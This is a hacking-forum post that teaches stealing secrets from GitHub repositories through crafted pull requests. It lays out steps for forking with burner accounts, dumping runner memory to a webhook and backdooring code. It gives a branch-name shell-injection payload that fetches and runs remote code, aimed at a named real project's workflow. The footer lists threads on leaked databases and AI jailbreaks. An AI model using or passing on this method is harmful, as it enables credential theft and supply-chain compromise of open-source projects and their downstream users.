How to Grab Secrets and Pwn Using Pull Requests on GItHub
by d3lirium - Tuesday December 3, 2024 at 05:23 PM
#1
I have not seen much about this topic on BF, but a lot of information about it online. People can gain a lot by using this stuff.

Grab Secrets, Credentials (to the cloud and more), Access from GitHub using Pull Requests

There are a number of techniques that you can use on GitHub that involve making a carefully crafted pull request that will send you the secrets it uses. This can be access tokens to PyPI, NPM, the Cloud, or other GitHub credentials.

What you do is:

1. Use the tools to find potential vulns
2. Use a burner/throwaway account to fork the repository
3. Use a payload in a Gist or other site and run it within a workflow that has secrets
4. Dump the runner's memory using a commonly available payload (see the Wiki of tools), send secrets to webhook
5. Profit - you can use the secrets, or use the GITHUB_TOKEN to backdoor code

There are hundreds of projects that you can do this with. This is a goldmine. So much untapped potential with these exploits. Some are injection, some you modify a shell/python script to run code. The resources cover it all - this post is simply to say "hey shit this works, get on it, or miss out on it."

Example, inject via branch name:

The code below is from ultralytics/actions used in ultralytics/ultralytics github repo. This is an 0-day, devs don't give a fuck - they just use ChatGpt to write their github actions and it's full of shitty bugs. You can inject code with a branch name that looks like:

$({curl,-sSfL,yourdomain}${IFS}|${IFS}bash})


This is because head_ref is the branch name, and that's just a simple shell injection.

run: |         git config --global user.name "${{ inputs.github_username }}"         git config --global user.email "${{ inputs.github_email }}"         git pull origin ${{ github.head_ref || github.ref }}         git add .

Use the secret you get for fun/profit/learning/whatever.

Tools (search them online)

* Poutine BoostSecurity
* Octoscan Synactiv
* Gato-X GitHub Attack Toolkit
* RAVEN Cycode

Resources

* Boost security Living-off-the-pipeline
* GitHub's own Pwn Request blog
* DEF CON / Black Hat talks
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  CREATE TELEGRAM BOT WITH PYTHON: LEARN AND EARN MONEY | FULL COURSE CyboDevil 93 7,660 07-07-2026, 06:53 PM
Last Post: xf489b9sev
  Forums and Telegrams channels Databases leak sites j4c1nt0 3,055 170,626 07-05-2026, 10:32 AM
Last Post: Holyxx
  [ ✅ ] Jailbreak AI : Mistral, DeepSeek, Z.AI and more 3rn3st 10 3,012 07-04-2026, 05:15 PM
Last Post: hashxyz
  Find leaked API keys and Tokens (regex) CreateThread 20 2,547 06-25-2026, 12:58 AM
Last Post: madafaka1
  --> Military Training And Research Center Of The Air Force <-- batman5464 82 5,337 03-28-2026, 12:37 AM
Last Post: lxstcxntury



 Users browsing this thread: 1 Guest(s)